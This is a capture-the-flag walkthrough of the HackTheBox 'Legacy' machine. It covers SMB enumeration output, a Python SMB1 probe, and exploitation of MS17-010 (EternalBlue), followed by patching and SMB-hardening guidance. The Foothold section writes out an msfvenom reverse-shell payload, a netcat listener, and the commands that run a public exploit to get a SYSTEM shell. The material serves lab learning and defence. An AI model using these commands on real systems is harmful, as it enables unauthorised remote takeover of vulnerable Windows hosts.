Legacy - HTB Easy Machine - English
About
Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows. Only one publicly available exploit is required to obtain administrator access.
Exploitation
Enumeration
Starting with an nmap scan we can see it is a Windows machine exposing only RPC, NetBIOS and SMB (135, 139 and 445); every other probed port is closed.
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
4095/tcp closed xtgui
7518/tcp closed unknown
10253/tcp closed eapol-relay
11257/tcp closed unknown
13767/tcp closed unknown
30522/tcp closed unknown
41588/tcp closed unknown
42743/tcp closed unknown
43244/tcp closed unknown
44251/tcp closed unknown
54772/tcp closed unknown
55622/tcp closed unknown
56234/tcp closed unknown
57817/tcp closed unknown
58519/tcp closed unknown
60227/tcp closed unknown
62123/tcp closed unknown
65121/tcp closed unknown
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:bb:25 (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2025-09-04T20:04:40+03:00
Next, netexec. The host accepts a null session (Null Auth:True) and confirms SMBv1 with signing disabled, but without a user or password share enumeration is denied, so we get nothing more.
└─ $ nxc smb 10.10.10.4 -u '' -p '' --shares
SMB 10.10.10.4 445 LEGACY [*] Windows 5.1 x32 (name:LEGACY) (domain:legacy) (signing:False) (SMBv1:True) (Null Auth:True)
SMB 10.10.10.4 445 LEGACY [+] legacy\:
SMB 10.10.10.4 445 LEGACY [-] Error enumerating shares: STATUS_ACCESS_DENIED
I also like to run enum4linux-ng, since it sometimes leaks extra information about the service, but here it got nothing either beyond confirming that the server only speaks SMB 1.0 and does not require signing.
enum4linux-ng 10.10.10.4 -A -C
ENUM4LINUX - next generation (v1.3.5)
==========================
| Target Information |
==========================
[*] Target ........... 10.10.10.4
[*] Username ......... ''
[*] Random Username .. 'hbuecrxe'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
===================================
| Listener Scan on 10.10.10.4 |
===================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=========================================================
| NetBIOS Names and Workgroup/Domain for 10.10.10.4 |
=========================================================
[+] Got domain/workgroup name: HTB
[+] Full NetBIOS names information:
- LEGACY <00> - B <ACTIVE> Workstation Service
- HTB <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
- LEGACY <20> - B <ACTIVE> File Server Service
- HTB <1e> - <GROUP> B <ACTIVE> Browser Service Elections
- HTB <1d> - B <ACTIVE> Master Browser
- ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
- MAC Address = 00-50-56-94-BB-25
=======================================
| SMB Dialect Check on 10.10.10.4 |
=======================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.0.2: false
SMB 2.1: false
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration
=========================================================
| Domain Information via SMB session for 10.10.10.4 |
=========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: LEGACY
NetBIOS domain name: ''
DNS domain: legacy
FQDN: legacy
Derived membership: workgroup member
Derived domain: unknown
=======================================
| RPC Session Check on 10.10.10.4 |
=======================================
[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''
[*] Check for guest access
[-] Could not establish guest session: STATUS_LOGON_FAILURE
=================================================
| Domain Information via RPC for 10.10.10.4 |
=================================================
[-] Could not get domain information via 'lsaquery': STATUS_ACCESS_DENIED
=============================================
| OS Information via RPC for 10.10.10.4 |
=============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 5.1
OS version: '5.1'
OS release: not supported
OS build: not supported
Native OS: Windows 5.1
Native LAN manager: Windows 2000 LAN Manager
Platform id: null
Server type: null
Server type string: null
===================================
| Users via RPC on 10.10.10.4 |
===================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
====================================
| Groups via RPC on 10.10.10.4 |
====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
======================================
| Services via RPC on 10.10.10.4 |
======================================
[-] Could not parse result of 'net rpc service list' command, please open a GitHub issue
====================================
| Shares via RPC on 10.10.10.4 |
====================================
[-] Could not list shares: timed out
=======================================
| Policies via RPC for 10.10.10.4 |
=======================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
=======================================
| Printers via RPC for 10.10.10.4 |
=======================================
[+] No printers returned (this is not an error)
Completed after 60.90 seconds
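What nxc and enum4linux-ng are doing in the dialect and security-mode checks above, as an added example that is not part of this walkthrough or of either tool: one SMB1 NEGOTIATE request is built and its reply parsed with nothing but the Python standard library. The sample reply is constructed to match what the scans reported for Legacy (user-level authentication, challenge/response, no signing, workgroup HTB); the dialect list, the placeholder challenge bytes and the probe() helper are my assumptions, and nothing contacts a host unless you run the script with a target.

```python
"""Minimal SMB1 NEGOTIATE probe (stdlib only), the check behind "SMBv1:True" / "signing:False".
Offsets follow the NT LM 0.12 negotiate response; build_sample_response() is constructed, not a capture."""
import socket
import struct
import sys

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
# The server replies with the index of the dialect it picks. Offering "SMB 2.002" last is how a
# client detects SMB2: an SMB2-capable server answers with an SMB2 header instead of an SMB1 index.
DEFAULT_DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"NT LM 0.12", b"SMB 2.002"]
# SecurityMode bits in the NT LM 0.12 reply
SEC_USER_LEVEL, SEC_ENCRYPT_PASSWORDS, SEC_SIGNING_ENABLED, SEC_SIGNING_REQUIRED = 0x01, 0x02, 0x04, 0x08

def smb1_header(command, flags=0x18, flags2=0x0001, mid=1):
    """32-byte SMB1 header (flags 0x18 = request, 0x98 = reply)."""
    return (SMB1_MAGIC
            + struct.pack("<BIBHH", command, 0, flags, flags2, 0)   # cmd, status, flags, flags2, pid_high
            + b"\x00" * 8                                            # SecurityFeatures
            + struct.pack("<HHHHH", 0, 0, 0xFEFF, 0, mid))           # reserved, tid, pid_low, uid, mid

def netbios_frame(smb):
    """NetBIOS session service header: type 0x00 + 24-bit big-endian length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

def build_negotiate(dialects=DEFAULT_DIALECTS):
    """SMB_COM_NEGOTIATE request: WordCount 0, ByteCount, then 0x02 + dialect + NUL per dialect."""
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    return netbios_frame(smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(body)) + body)

def parse_negotiate_response(data, dialects=DEFAULT_DIALECTS):
    """Parse the reply to build_negotiate() into a dict (dialect, security-mode bits, challenge, domain)."""
    if len(data) < 4 or data[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    smb = data[4:4 + int.from_bytes(data[1:4], "big")]
    if smb[:4] == SMB2_MAGIC:
        return {"dialect": "SMB2+", "smb1_only": False}
    if len(smb) < 35 or smb[:4] != SMB1_MAGIC or smb[4] != SMB_COM_NEGOTIATE:
        raise ValueError("unexpected SMB response")
    word_count, dialect_index = smb[32], struct.unpack_from("<H", smb, 33)[0]
    if dialect_index == 0xFFFF:                       # server rejected every offered dialect
        return {"dialect": None, "smb1_only": False}
    info = {"dialect": dialects[dialect_index].decode(),
            "smb1_only": b"SMB 2.002" in dialects}   # SMB2 was offered, server still chose SMB1
    if word_count != 17:                              # older dialect, different parameter layout
        return info
    mode = smb[35]
    info.update(user_level_security=bool(mode & SEC_USER_LEVEL),
                challenge_response=bool(mode & SEC_ENCRYPT_PASSWORDS),
                signing_enabled=bool(mode & SEC_SIGNING_ENABLED),
                signing_required=bool(mode & SEC_SIGNING_REQUIRED))
    clen = smb[66]                                    # ChallengeLength; ByteCount at 67, data from 69
    info["challenge"] = smb[69:69 + clen]
    info["domain"] = smb[69 + clen:].decode("utf-16-le", "ignore").rstrip("\x00")
    return info

def build_sample_response(dialect_index=2, security_mode=SEC_USER_LEVEL | SEC_ENCRYPT_PASSWORDS, domain="HTB"):
    """Constructed reply shaped like Legacy's (user-level, challenge/response, signing off). Not a capture."""
    hdr = smb1_header(SMB_COM_NEGOTIATE, flags=0x98)
    if dialect_index == 0xFFFF:
        return netbios_frame(hdr + struct.pack("<BHH", 1, 0xFFFF, 0))   # WordCount 1, empty ByteCount
    challenge = bytes(range(8))                                          # placeholder challenge bytes
    data = challenge + domain.encode("utf-16-le") + b"\x00\x00"
    # DialectIndex, SecurityMode, MaxMpx, MaxVcs, MaxBuf, MaxRaw, SessionKey, Caps, SystemTime, TZ, ChallengeLen
    params = struct.pack("<HBHHIIIIqhB", dialect_index, security_mode, 50, 1, 16644, 65536, 0, 0xE3FD, 0, 0, 8)
    return netbios_frame(hdr + bytes([17]) + params + struct.pack("<H", len(data)) + data)

def summarize(info):
    """One-line verdict in the spirit of nmap's smb-security-mode output."""
    if info["dialect"] is None:
        return "no common dialect"
    if info["dialect"] == "SMB2+":
        return "server negotiated SMB2 or newer"
    verdict = "dialect " + info["dialect"] + (", SMB1 only" if info["smb1_only"] else "")
    if "signing_required" in info:
        verdict += (", signing required" if info["signing_required"]
                    else ", signing enabled but not required" if info["signing_enabled"]
                    else ", signing disabled (dangerous)")
    return verdict

def probe(host, port=445, timeout=5):
    """Send one NEGOTIATE to a live host and parse the answer (network I/O; not used offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate())
        head = sock.recv(4)
        body, need = b"", int.from_bytes(head[1:4], "big")
        while len(body) < need:
            chunk = sock.recv(need - len(body))
            if not chunk:
                break
            body += chunk
    return parse_negotiate_response(head + body)

if __name__ == "__main__":
    result = probe(sys.argv[1]) if len(sys.argv) > 1 else parse_negotiate_response(build_sample_response())
    print(summarize(result), result)
```

Run it with no arguments to parse the constructed reply, or with a host to send a real NEGOTIATE. The SMB1-only verdict relies on the same trick the tools use: SMB 2.002 is offered in the dialect list, so a server that answers with an SMB1 dialect index instead of an SMB2 header has no SMB2 support.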
smb-vuln-ms17-010
Knowing it is a Windows XP host that only speaks SMBv1, I ran the nmap smb-vuln* scripts to check for known vulnerabilities. The ms17-010 check reports the host as vulnerable and gives us the CVE (CVE-2017-0143) and the Microsoft references.
nmap --script smb-vuln* -p 445 10.10.10.4
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-30 12:55 -0300
Failed to resolve " ".
Nmap scan report for 10.10.10.4
Host is up (0.34s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 12.56 seconds
Foothold
To exploit this vulnerability I used a Python script (the MS17-010_CVE-2017-0143 repository listed in the References) that uploads an executable to the target over the vulnerable SMBv1 service and runs it, giving us code execution from our terminal. It still requires Python 2 and an old impacket release, so we follow the repository's Docker method instead of installing them on the host.
First let's make the payload with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=9001 -f exe -o ms17-010.exe
Start our listener
nc -lvnp 9001
I use Arch Linux and already have Docker installed; if you don't, install it with the recommended method for your distro.
Then we follow the repository steps. The payload built above has to sit inside the build directory, because the Dockerfile copies it into the image:
mkdir exploit
cd exploit
cp ../ms17-010.exe .
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
Write the Dockerfile:
FROM python:2.7-alpine
RUN apk --update --no-cache add \
git \
zlib-dev \
musl-dev \
libc-dev \
gcc \
libffi-dev \
openssl-dev && \
rm -rf /var/cache/apk/*
RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txt
Build the Docker Container:
sudo docker build -t exploit .
Run the Container:
sudo docker run -it exploit /bin/sh
Downloading and Running the Exploit:
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143
python send_and_execute.py 10.10.10.4 ../ms17-010.exe
Running the exploit executes our payload on the target and we get the reverse shell on the listener:
└─ $ nc -lvnp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.10.4 1034
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
The shell runs as NT AUTHORITY\SYSTEM, so we can read both flags directly.
User
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4....
Root
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d25....
When I first solved this machine some time ago it was also vulnerable to MS08-067 (CVE-2008-4250, the smb-vuln-ms08-067 check), but at the time of writing this walkthrough I could only exploit it through MS17-010.
How to prevent it
The most effective way to avoid exploitation of MS17-010 (EternalBlue) is to apply Microsoft's security patches. The fix shipped in the MS17-010 security bulletin in March 2017 for supported systems, and in May 2017, after WannaCry, Microsoft released an out-of-band update for unsupported systems including Windows XP. Running outdated systems like Windows XP is nevertheless a critical risk, since outside such exceptions they receive no security updates at all.
Recommended actions:
- Apply security updates – Always keep Windows up to date and apply Microsoft’s patches. For legacy systems, seriously consider replacing them with supported versions.
- Disable SMBv1 – This protocol is obsolete and insecure, and should be disabled across all environments.
- Restrict access – Never expose SMB services to the internet. Allow access only from trusted internal networks through firewall rules or network ACLs.
- Network segmentation – Isolate legacy systems into restricted VLANs with minimal access to the rest of the infrastructure.
- Monitoring and response – Enable logging and monitor SMB traffic for suspicious activity. Use IDS/IPS solutions to detect known exploitation attempts.
- Plan for migration – If legacy systems (like Windows XP) are strictly required due to old software, plan their migration to modern environments or keep them isolated with no exposure to critical networks.
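Applied on a supported Windows host, the audit, SMBv1, signing and firewall steps above look like this. This is an added example of my own, not part of the original walkthrough: the 10.0.50.0/24 management subnet is a placeholder, and the KB IDs in the last step are the March 2017 MS17-010 security-only and monthly-rollup IDs for Windows 7 / Server 2008 R2, so substitute the IDs for your OS.

```powershell
# Added hardening example; run as Administrator on Windows 8.1 / Server 2012 R2 or later.
# 10.0.50.0/24 and the KB list below are placeholders, adjust them to your environment.

# 1. Audit: is SMBv1 still enabled, and is signing required?
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol, EnableSecuritySignature, RequireSecuritySignature

# 2. Disable SMBv1 on the server side and remove the feature entirely
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
Disable-WindowsOptionalFeature -Online -FeatureName 'SMB1Protocol' -NoRestart

# 3. Require SMB signing, which turns the "message_signing: disabled" finding into "required"
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

# 4. Restrict inbound SMB: turn off the broad built-in rules and allow only a trusted subnet.
#    The inbound default action is Block, so SMB from anywhere else is dropped.
Get-NetFirewallRule -DisplayGroup 'File and Printer Sharing' -Direction Inbound | Disable-NetFirewallRule
New-NetFirewallRule -DisplayName 'SMB-In from management subnet only' `
    -Direction Inbound -Protocol TCP -LocalPort 445,139 `
    -RemoteAddress 10.0.50.0/24 -Action Allow -Profile Domain,Private

# 5. First-pass check that the MS17-010 fix is installed (IDs are per OS version)
$ms17010 = @('KB4012212', 'KB4012215')
$installed = Get-HotFix | Where-Object { $_.HotFixID -in $ms17010 }
if (-not $installed) {
    Write-Warning 'No MS17-010 KB found; verify with patch management before trusting this host.'
}
```

Get-HotFix only lists the individual KBs, so on systems where a later cumulative update superseded them the check reports nothing even though the fix is present; treat it as a first pass and confirm with your patch-management tooling or an authenticated vulnerability scan. Requiring signing also breaks clients that cannot sign, which is one more reason to inventory SMBv1-only hosts before flipping it fleet-wide.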
In short, the attack was only possible because the system was outdated, running SMBv1, and unpatched. Basic patch management and disabling insecure protocols would have prevented this exploitation, and restricting who can reach port 445 would have prevented the attacker from even attempting it.
References
The master 0xdf
MS17-010_CVE-2017-0143
OpenCVE CVE-2017-0143
NIST CVE-2017-0143